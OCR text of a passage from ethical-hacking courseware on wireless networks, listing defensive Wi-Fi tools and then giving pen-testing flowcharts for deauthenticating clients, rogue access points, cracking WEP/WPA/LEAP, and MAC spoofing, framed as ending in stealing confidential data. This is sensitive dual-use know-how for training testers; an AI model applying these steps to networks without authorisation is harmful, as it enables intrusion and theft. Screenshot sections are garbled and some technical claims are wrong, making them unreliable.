Intrusion
Prevention
System
Corporate Wi-Fi Network

FIGURE 15.78: Cisco's Wireless IPS Deployment
Module 15 Page 2364
Ethical Hacking and Countermeasures Copyright by EC-C0l1ncil All Rights Reserved. Reproduction is Strictly Prohibited.
Wi-Fi Security Auditing Tool: AirMagnet WiFi Analyzer

J J It is a Wi-Fi networks auditing and troubleshooting tool Automatically detects security threats and other wireless network vulnerabilities It detects Wi-Fi attacks such as Denial of Service attacks, authentication/ encryptions attacks, network penetration attacks, etc. It can locate unauthorized (rogue) devices or any policy violator
CEH
A f fa ir * * KS *(*beHn-fc* [0 3 MDdt-twt-^7 ks U [3 1 N I t **-tST-V-9 tip 6< r >tm Uotwi-cn-to *e-T5TAI>* UniwrtvTVlP*
,CrffcfSiUf * = > ::P9:F9:6A* oe: u!< 0*e14:70 60 SE!JB9C FC:fB:4Af23l -00:.:07; 8
1 0 0 l0 0 l0e
0 WAJr , M ~ <*'': . a m 0 O p e n 1 . .
902 WDtwhcf!
O ssio
5 A<J-M0C AP (87) J
1 0 0 H 1 0 0 1 n r 1 0 0 IO C 1 0 01 0 c 0 w*a 1 0 0 IO C0 1 0 0 1 0 . 0 O p e 4! M 0 **AJ*
t. 1 N '* **n U *Ct
3 1TAI12 H - *J A lV lSEA dv< ffl ; ^ / 4 3 ^
VA iW tS t
AlrWlSE
*euilylDSdPS
. p*#o*runc Vk**0t 4
p . c * <* >^ cu iv RjvÂ Pv , 'lV w n f . uwaj * '
B S S S S fS .
2 ;
< ;.com
,//W W W ./ k e n e r
* *
W i-F i S e c u r it y A n a ly z e r
A u d i t in g
T o o l:
A irM a g n e t
W iF i
Source: http://www.flukenetworks.com AirMagnet WiFi Analyzer is a standard tool for mobile auditing and troubleshooting enterprise Wi-Fi networks. It helps IT staff solve end-user issues while automatically detecting security threats and wireless network vulnerabilities. The solution enables network managers to test and diagnose dozens of common wireless performance issues including throughput issues, connectivity issues, device conflicts, and signal multipath problems. It includes a full compliance reporting engine, which automatically maps collected network information to requirements for compliance with policy and industry regulations. AirMagnet WiFi Analyzer is available in "Express" and "PRO" versions. Express provides the core building blocks of Wi-Fi troubleshooting and auditing with the ability to see devices, automatically identify common problems, and physically locate specific devices. PRO version significantly extends all the capabilities found in the Express version and adds many more to provide a Wi-Fi tool to solve virtually any type of performance, security, or reporting challenge in the field. AirMagnet WiFi Analyzer can detect Wi-Fi attacks such as DoS attacks, authentication/encryptions attacks, network penetration attacks, etc. It can easily locate unauthorized (rogue) devices or any policy violator.
Module 15 Page 2365
Ail Magnet W iFi Analyze! PRO - deino 55.0%

H e* 2.4/5GHz * Dashboard 2 4GHr(002 b . W 3 J g All Devices AP g STA Ad-Hoc
1 0 - IL i-
Start
\s
|Q Security SSID
I
10
Signal Level(dBm)
I Device
11 (D
Type: AP 11 1C:BD:B9:B6:56:5A 1C:BD:B9:B6:66:5A FC:FB:FB:6A:E2:3A 6a:BD;A8;D3:07;E2 FC:FB:FB:6A:E2:32 00:13:60:6E:64:70 68:0D:AB:D3:33:A1

E0:46:9A: 5E:26:90
n
n
-100 -100 0 100 86

0
WPA2-P N WPA2-E N Open Open

N
dirk srnonte
Authori
1 > 1 gnal Levd(cBm]

1
3C 40
* 149 AME-TEST-AP-9 11 lap-oeij-an-tek
n n a n n n
n
-100 1 0 0 0 100 1 0 0 0 100 -94 0 -100 -100 0 -100 -100 0 -100 -100 0 -100 -100 0 100 -100 m < P
. 1 nn -inn
0 0
5GH48021 W m O
V 11 AME-TEST-AP-9 V 161 btocktest-ap-7 lap-beij-cn-tek *

6
WPA2-E N N WPA2-E N WPA2-P N WPA2-E N WPA2-E Open

W V ll- T N
NG5nev don't bk NETGE^

AHC-E1
E0:46:9A:SE:2B:9D
10 r >
-
11 AME-TEST-AP-9 V 11 lap-beij-cn-tek V 11 lap-beij-cn-tek * 149 AME-TEST-AP-9

ft l*r*->V^n -rrs
FC:FBfB:6A:E2:31
68:BO:AB:D3:07:E1
802.11 Inform ation O SSID (3 3 1 Q Ad-Hoc - K Infrastructure i> AP (87)
5a:BC:27:93:EE:B2 FC:FBi=B:6A:E2:39 /^4 . 4
n n
Author!
WPA2-P N
AHC
A 11W I S EA d v i c e
SS T A( 1 2 1 )
1 -
( 3 Security IDS/IPS (43.198.89,3) ^ Performance Violation (0,0,9,81) Broadcast Uncast Total Fra.. 6887 Multicast 11361 18637 ..... 1k & 389 0 0.00?S
AirWISE ^ Security IDS/IPS Pl Ccnfioiiation Vulneiabkt + C3 IDS Denial of Service A D IDS Seemly Penetratio * Q Rogue AP arid Slaton Q User Authenticaticr! &Er Performance Violation Q Channel or Device Overl
A irW IS E 'J___ S' curty DS/tPS
Performance V lolation 7
U---- ---------< _
I I Filter Alarms By Device
a!! m
F IG U R E 15.79: A irM a g n e t W iF i Analyzer Screensho t
Module 15 Page 2366
Wi-Fi Security Auditing Tool: A irD efense
C EH
-
,^
W i-F i S e c u r it y A u d i ti n g T o o l: A i r D e f e n s e
Source: http://www.airdefense.net
AirDefense provides a single Ul-based platform for wireless monitoring, intrusion protection, automated threat mitigation, etc. It provides tools for wireless rogue detection, policy enforcement, intrusion prevention, and regulatory compliance. It uses distributed sensors that work in tandem with a hardened purpose-built server appliance to monitor all 802.11 (a/b/g/n) wireless traffic in real time. It analyzes existing and day-zero threats in real time against historical data to accurately detect all wireless attacks and anomalous behavior. It enables the rewinding and reviewing of detailed wireless activity records that assist in forensic investigations and ensure policy compliance.
Module 15 Page 2367
N&twori<
Alarm?
Conflguraton
Ik* P0IM Wirele** Client J CH Quick Stajrity Viow I K.O.0 Chnntl ftm ldJ *<* W lflM Ar
W ire dS w < r f1 s
WfflM S
Wired Switches W1 rele55 SwitC. ..
1,?on
1,624
S e n s o rs
wre*es$ Cte^ts BSS*
FIGURE 15.79: AirDefense Screenshot
Module 15 Page 2368
Wi-Fi Security Auditing Tool: Adaptive W ireless IPS
f Fu
Copyright by IG-COHCil. All Rights Reserved. Reproduction is Strictly Prohibited.
()
W i-F i S e c u r it y A u d i ti n g T o o l: A d a p ti v e W i r e l e s s IP S
Source: http://www.cisco.com
Adaptive Wireless IPS (WIPS) provides specific network threat detection and mitigation against malicious attacks, security vulnerabilities, and sources of performance disruption. It provides the ability to detect, analyze, and identify wireless threats. It also delivers proactive threat prevention capabilities for a hardened wireless network core that is impenetrable by most wireless attacks, allowing customers to maintain constant awareness of their RF environment.
Module 15 Page 2369
I I I II I I I
CISCO
A la rm S iiiiiiiih v^
Roports Configure Sen
Wireless Control System U<#r: r rn t tg! virtual D om ain f i t ' Logout
Monitor 8ytm
Advanced Parameters: sanity-mse

*eri/OM ' Mctaltv aar/c# > aystn > fetsm ai General Information Product Nome Version Started At Current Server Time Timezonc Hardware Restarts Active Sessions Cisco Mobility Scrvics Cnone 6 0*2 A 2/l61'09 1 49 PM 2/17,9:54 09 AM Am sricc/Lc5_An gs! c s 10 1 session Timeout 30 1440 | 1 99999 rains J 1 99399 rnins Absent Data cleanup interval Logging Level Trocc fcd Bviblc 0 Erable Kotiftflt Hjrdsiare y Cor Engine Database Gcnerol MSEAocation Servers Object Manager SMMP Mediation XML Mediation Asynchronous NMSP Protocol Product Idenbfier (PID) Version Idortfiod (VJD) Serial Number (SN) Advanced Parameters Advanced Debuo Humber of Dcj> to keep Events 2 J 1 99999 AIR-MSE-3010-K9 V01 Not Specified
L J Generd Properttes NM5P Prt dm-ters y j Atr up se1nn< 1 rap Lest raters | Advanced Parameters gJLcgs (fcjAtcam i n Status 1j paanrenance Context Aware Service vlPS Service NIP. Service O
a
|
Enable Ed Encbls bd Era b19 LJ Enable Ed & b k Q Enable Q ervabl# Cl* jr C9nit 0ration
FIGURE 15.80: Adaptive Wireless IPS Screenshot
Module 15 Page 2370
Wi-Fi Security Auditing Tool: Aruba RFProtect WIPS

Integrated wireless intrusion detection and prevention
f FH
YOU ARE NO W
Automatic threat mitigation for centrally evaluating forensic data, and actively containing rogues and locking down device configuration Automated compliance reporting to meet policy mandates for PCI, HIPAA, D0D 8100.2, and GLBA with automated report distribution that is tailored to specific audit requirements
IN A W IF I A R E A
I The M o b ile E d g e Company

http ://www. arubanetworks.com
Copyright by EG-GtUCil. All Rights Reserved. Reproduction is Strictly Prohibited.
W i-F i S e c u r it y A u d i t i n g T o o l: A r u b a R F P r o t e c t W IP S
Source: http://www.arubanetworks.com Aruba's RFprotect system represents the breed overlay wireless intrusion detection and prevention (WIDP) system. RFprotect Distributed is a wireless security solution that incorporates the Wireless Threat Protection Framework, including user-defined threat signatures for complete threat detection, attack prevention, "no wireless" policy enforcement, and compliance reporting inside the enterprise. It is capable of doing automatic threat mitigation for centrally evaluating forensic data, actively containing rogues, and locking down device configuration and automated compliance reporting to meet policy mandates for PCI, HIPAA, D0 D 8100.2, and GBLA with automated report distribution that is tailored to specific audit requirements.
Module 15 Page 2371
Wi-Fi Intrusion Prevention System
CEH
H E
Enterasys Intrusion Prevention System

http://www.enterasys. com
Network Box IDP

http://www.network-box.co.uk
RFProtect Wireless Intrusion Protection

http://www.arubanetworks.com
AirMobile Server
http://www.airm obile.5e
SonicWALL Wireless Networking

http://o-www.sonicwall, com
WLS Manager
http://www.airpatrolcorp. com
( 1 * 1
HP TippingPoint IPS
http://hl 7007. wwwl.hp.com
Wireless Policy Manager (W P M )

http://www.airpatrolcorp.com
*
0
AirTight W IPS
http://www.airtightnetworks.com
z.
ZENworks Endpoint Security Management

http://www.no veil, com
,m im i
W i-F i I n t r u s i o n P r e v e n t i o n S y s te m
Wi-Fi intrusion prevention systems block wireless threats by automatically scanning, detecting, and classifying all unauthorized wireless access and rogue traffic to the network, thereby preventing neighboring users or skilled hackers from gaining unauthorized access to the Wi-Fi networking resources. A few Wi-Fi intrusion prevention systems are as follows: 9 9 9 9 9 9 9 9 9 9 Enterasys Intrusion Prevention System available at http://www.enterasvs.com RFProtect Wireless Intrusion Protection available at http://www.arubanetworks.com SonicWALL Wireless Networking available at http://o-www.sonicwall.com HP TippingPoint IPS available at http://hl7007.wwwl.hp.com AirTight WIPS available at http://www.airtightnetworks.com Network Box IDP available at http://www.network-box.co.uk AirMobile Server available at http://www.airmobile.se WLS Manager available at http://www.airpatrolcorp.com Wireless Policy Manager (W PM ) available at http://www.airpatrolcorp.com ZENworks Endpoint Security Management available at http://www.novell.com
Module 15 Page 2372
Wi-Fi Predictive Planning Tools

AirMagnet Planner
http://www.flukenetworks.com
CEH
h&
Connect EZ Predictive RF CAD Design

http://www.connect802.com
Cisco Prime Infrastructure

http://www.cisco.com
n
<^K i
Ekahau Site Survey (ESS)

http://www.ekahau. com
AirTight Planner
ZonePlanner
http://www.ruckuswireless.com
LANPIanner
_
"
http://www.m otorola, com
[ j j
Wi-Fi Planning Tool

http://www.aerohive.com
i n
RingMaster
http://www.juniper.net
TamoGraph Site Survey

http://www.tamos, com
;;
W i-F i P r e d i c t i v e P l a n n i n g T o o ls
Wi-Fi predictive planning tool successfully plan, deploy, monitor, troubleshoot, and report on indoor and outdoor wireless networks from a centralized location. A few Wi-Fi predictive planning tools are as follows: 9 9 9 9 Q Q 9 AirMagnet Planner available at http://www.flukenetworks.com Cisco Prime Infrastructure available at http://www.cisco.com AirTight Planner available at http://www.airtightnetworks.com LANPIanner available at http://www.motorola.com RingMaster available at http://www.juniper.net Connect EZ Predictive RF CAD Design available at http://www.connect802.com Ekahau Site Survey (ESS) available at http://www.ekahau.com
Q ZonePlanner available at http://www.ruckuswireless.com 9 9 Wi-Fi Planning Tool available at http://www.aerohive.com TamoGraph Site Survey available at http://www.tamos.com
Module 15 Page 2373
Wi-Fi Vulnerability Scanning Tools

to r Zenmap
http://nmap.org
CEH
Cj
Nexpose Community Edition

http://www.rapid7.com
Nessus
http://www. tenable.com
____
^
WiFish Finder ^
OSWA
http://securitystartshere.org
Penetrator Vulnerability Î Scanning Appliance

http://www.secpoint.com
TgH
WiFiZoo
http://community.corest.com
SILICA
http://www.im m unityinc.com
Network Security Toolkit

___ J ___ J http://networksecuritytoolkit.org
Ijr3 |
Wireless Network Vulnerability Assessment

http://www.secnap.com
W i-F i V u l n e r a b i l i t y S c a n n i n g T o o ls
Wi-Fi vulnerability scanning tools are vulnerability scanners that determine the weaknesses in the wireless networks and secure them before attackers actually attack and compromise. The following are a few Wi-Fi vulnerability scanning tools: e 9 9 9 Q Q 9 Q Zenmap available at http://nmap.org Nessus available at http://www.tenable.com OSWA available at http://securitystartshere.org WiFiZoo available at http://community.corest.com Network Security Toolkit available at http://networksecuritvtoolkit.org Nexpose Community Edition available at http://www.rapid7.com WiFish Finder available at http://www.airtightnetworks.com Penetrator Vulnerability Scanning Appliance available at http://www.secpoint.com
Q SILICA available at http://www.immunityinc.com 9 Wireless Network Vulnerability Assessment available at http://www.secnap.com
Module 15 Page 2374
Module Flow
CE H
M o d u l e F lo w
As mentioned previously, wireless networks are more vulnerable to attacks compared to wired networks. Wireless networks provide comfort and allow users to access the network from anywhere within the region. This is making wireless networks more popular today. Wireless networks are insecure if configured improperly and not maintained. Hence, in order to secure wireless networks, you should conduct pen testing on the WLAN to determine the security loopholes and then fix them. This whole section is devoted to Wi-Fi penetration testing, which describes the steps carried out by the pen tester to conduct penetration testing on a target WI-FI network.
Wireless Concepts
1<f
Wireless Encryption
Wireless Threats
Bluetooth Hacking
Module 15 Page 2375
Module 15 Page 2376
W ire le s s P e n e tr a tio n T e s tin g

A penetration test is the process of actively evaluating information security measures in a wireless network. There are a number of ways that this can be undertaken. The information security measures are actively analyzed for design weaknesses, technical flaws, and vulnerabilities. The results are delivered comprehensively in a report to executive, management, and technical audiences. The wireless penetration testing can be done for the following purposes: 9 Security Control Auditing: To test and validate the efficiency of wireless security protections and controls Data Theft Detection: Find streams of sensitive data by sniffing the traffic Information System Management: Collect information on security protocols, network strength, and connected devices, typically using network discovery, service identification modules, port scanners, and the OS Risk Prevention and Response: Provide s comprehensive approach of preparation steps that can be taken to prevent upcoming exploitation Upgrading Infrastructure: Change or upgrade existing infrastructure of software, hardware, or network design Threat Assessment: Identify the wireless threats facing an organization's information assets
9 9
Module 15 Page 2377
W ireless Penetration Testing Framework

Wireless Pen Testing Framework m Discover wireless devices wt If wireless device is found, document all
the findings a If the wireless device found is using Wi-Fi network, then perform general Wi-Fi network attack and check if it uses WEP encryption If WLAN uses WEP encryption, then perform WEP encryption pen testing or else check if it uses WPA/WPA2 encryption If WLAN uses WPA/WPA2 encryption, then perform WPA/WPA2 encryption pen testing or else check if it uses LEAP encryption If WLAN uses LEAP encryption, then perform LEAP encryption pen testing or else check if WLAN is unencrypted If WLAN is unencrypted, then perform unencrypted WLAN pen testing or else perform general Wi-Fi network attack
r V
(itilwd
tt*H4i ttMhM
EH
W ire le s s P e n e tr a tio n T e s tin g F ra m e w o rk
Generally, penetration testing is conducted through a series of steps to find out the vulnerabilities in the wireless network. The following are those penetrations steps that you, as a penetration tester, must follow to conduct a penetration test on a target wireless network. Step 1: Discover wireless devices The first step in the wireless penetration testing framework is discovering wireless devices in the vicinity. Several Wi-Fi network discovery tools are available online that give more information about the wireless networks in the vicinity. Examples of tools that can be used for finding Wi-Fi networks are: inSSIDer, NetSurveyor, Netstumbler, Vistumbler, and Wavestumbler. Step 2: Check whether a wireless device is found If YES, document all the findings such as the wireless devices in the region. If NO, try again to discover the wireless devices. Step 3: See if there is a Wi-Fi network If YES, perform a general Wi-Fi network attack and check for the encryption mechanism used by the Wi-Fi network. If NO, again start discovering wireless devices in the vicinity.
Module 15 Page 2378 Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Step 4: Check whether the Wi-Fi network uses W EP encryption If YES, perform W EP penetration testing to break the encryption. If NO, check for other encryption mechanisms. WEP encryption, Wired Equivalent Privacy (WEP), is a security protocol specified in the IEEE Wireless Fidelity (Wi-Fi) standard 802.11b that is designed to provide a wireless local area network (WLAN) with a level of security and privacy comparable to what is usually expected of a wired LAN. W EP is a component of the IEEE 802.11 WLAN standards. Its primary purpose is to provide for confidentiality of data on wireless networks at a level equivalent to that of wired LANs. Physical security can be applied in wired LANs to stop unauthorized access to a network. Step 5: Check whether the Wi-Fi network uses WPA/WPA2 encryption If YES, then perform WPA/WPA2 penetration testing. If NO, check for other possibilities of encryption mechanisms. WPA encryption is less exploitable when compared with WEP encryption. But WPA is also a little cracker friendly. WPA/WAP2 can be cracked by capturing the right type of packets. Cracking can be done offline. Offline cracking only involves being near the AP for few moments. Step 6: Check whether the Wi-Fi network uses LEAP Encryption? If YES, then perform LEAP penetration testing. If NO, check whether the wireless LAN network is encrypted or not. LEAP is a Lightweight Extensible Authentication Protocol. It is a proprietary WLAN authentication protocol developed by Cisco. Step 7: Determine if it is an unencrypted WLAN If YES, then perform unencrypted WLAN penetration testing. If NO, perform a general Wi-Fi network attack.
Module 15 Page 2379
Wi-Fi Pen Testing I

General penetration steps for all Wireless networks:
1. Create a rogue access point Deauthenticate the client using the tools such as Karma, Hotspotter, Airsnarf, etc., and then check for client deauthentication If client is deauthenticated, then associate with the client, sniff the traffic and check if passphrase/certificate is acquired, or else try to deauthenticate the client again If passphrase is acquired, then crack the passphrase using the tool wzcook to steal confidential information or else try to deauthenticate the client again
2.
W i-F i P e n T e s t i n g F r a m e w o r k
To conduct a penetration test by simulating the actions of an attacker, follow these steps: Step 1: Perform a general Wi-Fi network attack Wi-Fi pen testing framework begins with the general Wi-Fi network attack. Step 2: Create a rogue access point In order to create a backdoor into a trusted network, an unauthorized or unsecured access point is installed inside a firewall. Any software or hardware access point can be used to perform this kind of attack. Unauthorized access points can allow anyone with an 802.11equipped device onto the corporate network, which puts a potential attacker close to the mission-critical resources. With the help of wireless sniffing tools, the following can be determined: access points for the authorized Medium Access Control (MAC) address, vendor name, or security configurations. The attacker can then create a list of MAC addresses of authorized access points on the LAN, and cross check this list with the list of MAC addresses found by sniffing. An access point should be considered a rogue if it looks suspicious. It can possibly be located by using a simple known technique that involves walking with a wireless access point-sniffing device in the direction where the signal strength of the access point's beacon increases.
Module 15 Page 2380
Finally, determine which part of the network needs to be examined. Sometimes a rogue access point may be an active access point that is not connected to the corporate network, but these access points are not security issues. When an access point is found that interfaces with the corporate network, it must be shut off immediately. Using a centralized network-monitoring device attached to the wired network, workstations and individual users that use multiple systems can be tracked easily. It is important to walk through a company's facilities so that rogue access points are detected and eliminated. Centralized network-monitoring devices are spyware that are used to monitor networks. Step 3: Is the client deauthenticated? If YES, associate with client. If NO, deauthenticate the client using a Wi-Fi vulnerability scanning tools such as Karma, Hotspotter, Airsnarf, etc. Step 4: Associate the client After deauthentication, the attacker or the pen tester should associate with the client in order to perform an attack on the Wi-Fi network. Several techniques are available to associate with the client. Step 5: Sniff the traffic After being associated with the client, the attacker or the pen tester should sniff the network traffic in order to analyze the traffic and search for the weak clients. In this step, the attacker should capture the IVs generated by making use of tools such as airodump-ng or Cain & Abel with a bssid filter to collect unique IVs. With the help of wireless sniffing tools, the authorized Medium Access Control (MAC) The attacker can then create a list of MAC and cross check this list with the list of MAC following can be determined: access points for the address, vendor name, or security configurations. addresses of authorized access points on the LAN, addresses found by sniffing.
Step 6: Determine if there ia an acquired passphrase/certificate? After sniffing the traffic, check whether any passphrase/certificate of the Wi-Fi network is acquired. If YES, then try to crack the passphrase/certificate. If NO, search for the deauth client.
Module 15 Page 2381
Step 7: Crack the passphrase The pphrase is an element that is used for ensuring the security of the wireless network's data transmission. However, these this passphrase can consist of some flaws that attackers use to their advantage to launch attacks on the WLANs. Passphrases can be cracked using tools such as wzcoock. Step 8: Steal confidential information After cracking the passphrases, the attackers or the pen testers have full access to the network, as a legitimate user. After attaining the access credentials of a legitimate client, the attacker can steal the confidential or sensitive information of the clients or network.
Module 15 Page 2382
Pen Testing LEAP Encrypted WLAN

START
v
Deauthenticate the client using tools such as Karma, Hotspotter, Airsnarf, etc. If client is deauthenticated, then break the LEAP encryption using tools such as asleap, THCLEAP Cracker, etc., to steal confidential information or else try to deauthenticate the client again
Break LEAP
Steal Confidential Information
Use tools such as asleap, THC-LEAP Cracker, etc.
J %^
Copyright by IG -C O H C il. All Rights Reserved. Reproduction is Strictly Prohibited.
P e n T e s t i n g a L E A P - E n c r y p te d W L A N
Penetration testing of the LEAP-encrypted WLAN involves the following steps: Step 1: Locate the LEAP-encrypted WLAN Pen testing a LEAP-encrypted WLAN begins with locating the LEAP-encrypted WALN. Step 2: Check for the deauth client If the client is deauthenticated, then break the LEAP encryption. LEAP stands for Lightweight Extensible Authentication Protocol. It is a proprietary wireless LAN authentication method developed by Cisco. It allows clients to reauthenticate frequently and generates a new W EP key for every successful authentication. Step 3: Break LEAP Though LEAP is more secure than other encryption mechanisms, it can also be broken using tools such as asleap, THC-LEAP Cracker, etc. In order break into the WLAN that is protected with LEAP encryption, the attacker first needs to break LEAP. Step 4: Steal confidential information Successfully breaking LEAP gives full network access to the attacker. Therefore, the attacker can steal confidential information of the client or network.
Module 15 Page 2383
P e n T e s t i n g W P A /W P A 2 E n c r y p t e d W LAN
Oeauth Client?
Use tools such as

Karma, Hotspotter, Airsnarf, etc.
f VJ
Sniff the Traffic
Captured
>
EAPOL
....... >
Deauthenticate the client using tools such as Karma, Hotspotter, Airsnarf, etc. If client is deauthenticated, sniff the traffic and then check the status of capturing EAPOL handshake or else try to deauthenticate the client again If EAPOL handshake is captured, then perform PSK dictionary attack using tools such as coWPAtty, Aircrack-ng, etc. to steal confidential information or else try to deauthenticate the client again Copyright by IG-C0HCil. All Rights Reserved. Reproduction is Strictly Prohibited.
Penetration testing of a WPA/WPA2-encrypted wireless network consists of the following steps: Step 1: Determine if the network is WPA/WPA2 encrypted First check whether the wireless network is WPA/WPA2 encrypted or not. If the WLAN is WPA/WPA2 encrypted, then deauthenticate the client using tools such as Karma, Hotspotter, Airsnarf, etc. Step 2: Determine if the client is deauthenticated Check whether the client is deauthenticated or not. If YES, sniff the traffic. If NO, check the encryption mechanism and try to deauthenticate the client using the tools. Step 3: Sniff the traffic The pen tester should sniff the network traffic in order to analyze the traffic and search for weak clients. In this step, the attacker should capture the IVs generated by making use of tools such as airodump-ng or Cain & Abel with a bssid filter to collect unique IVs. With the help of wireless sniffing tools, the following can be determined: access points for the authorized Medium Access Control (MAC) address, vendor name, or security configurations.
P e n T e s t i n g a W P A /W P A 2 - E n c r y p te d W L A N
Module 15 Page 2384
The attacker can then create a list of MAC addresses of authorized access points on the LAN, and cross check this list with the list of MAC addresses found by sniffing. Step 4: Determine if the EAPOL handshake is captured After sniffing the traffic, check whether the EAPOL handshake is captured or not. If YES, perform a WPA/WPA2 dictionary attack. If NO, check whether the client is deauthenticated or not. Step 5: Perform a WPA/WPA2 dictionary attack After capturing the EAPOL handshake, perform a WPA/WPA2 dictionary attack by creating a list of possible passphrases, compute the hashes of those guesses, and check them against the captured EAPOL. This technique is referred to as a dictionary attack. WPA/WPA2 dictionary attacks can be performed using the tools such as coWPAtty, Aircrak-ng, etc. Step 6: Steal confidential information The final step in the process of pen testing a WPA/WPA2-encrypted WLAN is stealing the confidential information.
Module 15 Page 2385
Pen Testing WEP Encrypted WLAN

J J Check if the SSID is visible or hidden
(itilwd
c EH
tt*H4i IlMhM
If SSID is visible, sniff the traffic a nd then check the status of packet capturing If the packets are captured/injected, then break the WEP key using tools such as Aircrack-ng, Airsnort, WEPcrack, etc., or else sniff the traffic again. If SSID is hidden, then deauthenticate the client using tools such as Aireplay-ng, Commview, etc., associate the client and then follow the procedure of visible SSID
P e n T e s t i n g a W E P - E n c r y p te d W L A N
Penetration testing of a WEP-encrypted WLAN consists of the following steps: Step 1: Determine of the WLAN is W EP encrypted First check whether the wireless network is WEP encrypted or not. If the WLAN is WEP encrypted, then apply the WPA/WPA2 penetration testing on the wireless network. Step 2: Check for a visible SSID Check whether the SSID of the WLAN is visible or not. The SSID must be visible in order for the Wi-Fi to work properly. If YES, sniff the network traffic. If NO, deauthenticate the client using the tools such as Aireplay-ng, Commview, V o id ll, etc. After dauthentication try to associate with the client in order to sniff the network traffic. Step 3: Sniff the traffic After getting associated with the client, the attacker or the pen tester should sniff the network traffic in order to analyze the traffic and search for the weak clients. In this step the attacker should capture the IVs generated by making use of tools such as airodump-ng or Cain & Abel with a bssid filter to collect unique IVs. With the help of wireless sniffing tools, the following can be determined: access points for the authorized Medium Access Control (MAC) address, vendor name, or security configurations.
Module 15 Page 2386 Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
The attacker can then create a list of MAC addresses of authorized access points on the LAN, and cross check this list with the list of MAC addresses found by sniffing. Step 4: Determine if the packets are captured or injected After sniffing the network traffic, check the status of the packet capturing. Check whether the packets are captured/injected. If the status of the captured/injected packets is YES, then break the W EP or otherwise, sniff the network traffic again. NetworkMiner is a Network Forensic Analysis Tool (NFAT) for Windows. It can be used as a passive network sniffer/packet capturing tool in order to detect operating systems, sessions, hostnames, open ports, etc. without putting any traffic on the network. Step 5: Break W EP After injecting the packets, break the W EP key using tools such as Aircrack-ng, Airsnort, WEPcrack, etc., WEP is the encryption mechanism that is implemented for providing security for the data transmission of the Wi-Fi network. It has some programming flaws in it that are vulnerable to attacks. These W EP keys can be broken easily. Step 6: Launch replay attacks After attaining the WEP encryption key, the attacker can easily launch replay attacks on wireless networks. 1. Check if the SSID is visible or hidden. 2. 3. If the SSID is visible, sniff the traffic, and then check the status of packet capturing. If the packets are captured/injected, then break the WEP key using tools such as Aircrack-ng, Airsnort, WEPcrack, etc., or otherwise sniff the traffic again. If the SSID is hidden, then deauthenticate the client using tools such as Aireplay-ng, Commview, V o id ll, etc.; associate the client and then follow the procedure of a visible SSID.
4.
Module 15 Page 2387
Pen Testing Unencrypted WLAN

Scan the WiFi Network
(itilwd
C EH
tt*H4i IlMbM
START
Check if the SSID is visible or hidden
Deauth Client
If SSID is visible, sniff for IP range and then check the status of MAC filtering
If MAC filtering is enabled, spoof valid MAC using tools such as SMAC or connect to the AP using IP within the discovered range
Connect to the AP using IP within the discovered range
If SSID is hidden, discover the SSID using tools such as Aireplay-ng, and follow the procedure of visible SSID
Copyright by IG-COHCil. All Rights Reserved. Reproduction is Strictly Prohibited.
P e n T e s tin g U n e n c ry p te d W LAN
The following steps illustrate the process of penetration testing of an unencrypted wireless network: Step 1: Scan the Wi-Fi network Penetration testing of a WLAN begins with the scanning of the Wi-Fi network. Scan for the networks to map out the wireless networks in the area. Step 2: Determine if the WLAN is unencryted Check whether it is unencrypted WLAN or encrypted WLAN. If the WLAN is unencrypted, then proceed with the process of pen testing. Step 3: Determine if the SSID is visible Check whether the SSID of the WLAN is visible or not. The SSID must be visible in order for the Wi-Fi to work properly. If YES, sniff for the IP range. If NO, deauthenticate the client using the tools such as Aireplay-ng, Commview, V o id ll, etc. Sfter deauthentication, try to associate with the client using the tools such as Airplay-ng or CommView in order to sniff the IP range. Step 4: Sniff for IP range
&
Module 15 Page 2388
Use the IP sniffing tools to sniff and discover the IP range of the network. The attacker can launch an attack on the wireless network with a known valid IP range. Step 5: Determine if MAC filtering isenabled After retrieving the IP range using the IP sniffing tools, check for MAC filtering. Check whether MAC filtering is enabled or disabled. If MAC filtering is enabled, then spoof for the valid MAC address. MAC addresses are the requisite credentials for accessing the network. Therefore, if the attacker wants to get connected with the target network, then he or she should have a valid MAC address. If MAC address filtering is disabled, then the attacker can connect to the AP using IP within the discovered range. Step 6: Spoof a valid MAC A valid MAC address can be obtained by spoofing it. MAC addresses can be spoofed using tools such as MAC ID changer (TMAC, SMAC).
Module 15 Page 2389
M o d u le S u m m a ry
CEH
IEEE 802.11 standards based Wi-Fi networks are widely used for communication and data transfer across a radio network A Wi-Fi infrastructure generally consists of hardware components such as wireless routers and APs, antennas, relay towers and authentication servers, and software components such as encryption algorithms, key management and distribution mechanisms Most widely used wireless encryption mechanisms include WEP, WPA and WPA2, of which, WPA2 is considered most secure W EP uses 24-bit initialization vector (IV) to form stream cipher RC4 for confidentiality, and the CRC-32 checksum for integrity of wireless transmission WPA uses TKIP which utilizes the RC4 stream cipher encryption with 128-bit keys and 64-bit keys for authentication whereas WPA2 encrypts the network traffic using a 256 bit key with AES encryption W EP is vulnerable to various analytical attack that recovers the key due to its weak IVs whereas WPA is vulnerable to password brute forcing attacks Wi-Fi networks are vulnerable to various access control, integrity, confidentiality, availability and authentication attacks Wi-Fi attack countermeasures include configuration best practices, SSID settings best practices, authentication best practices and wireless IDS systems
M o d u le S u m m a ry
9 IEEE 802.11 standards based communication and data transfer across a radio network.
Wi-Fi
networks
are
widely
used
for
A Wi-Fi infrastructure generally consists of hardware components such as wireless routers and APs, antennas, relay towers and authentication servers, and software components such as encryption algorithms, key management, and distribution mechanisms. Most widely used wireless encryption mechanisms include WEP, WPA, and WPA2, of which, WPA2 is considered most secure. WEP uses a 24-bit initialization vector (IV) to form a stream cipher RC4 for confidentiality and the CRC-32 checksum for integrity of wireless transmission. 0 WPA uses TKIP,which utilizes the RC4 stream cipher encryption with 128-bit keys and 64-bit keys for authentication, whereas WPA2 encrypts the network traffic using a 256 bit key with AES encryption. W EP is vulnerable to various analytical attacks that recover the key due to its weak IVs, whereas WPA is vulnerable to password brute forcing attacks.
Module 15 Page 2390
Wi-Fi networks are vulnerable to various access control, integrity, confidentiality, availability, and authentication attacks. Wi-Fi attack countermeasures include configuration best practices, SSID settings best
Module 15 Page 2391

CEHv8 Module 15 Hacking Wireless Networks PDF

Încărcat de

Informații document

Descriere originală:

Titlu original

Drepturi de autor

Formate disponibile

Partajați acest document

Partajați sau inserați document

Opțiuni de partajare

Vi se pare util acest document?

Este necorespunzător acest conținut?

Drepturi de autor:

Formate disponibile

CEHv8 Module 15 Hacking Wireless Networks PDF

Încărcat de

Drepturi de autor:

Formate disponibile

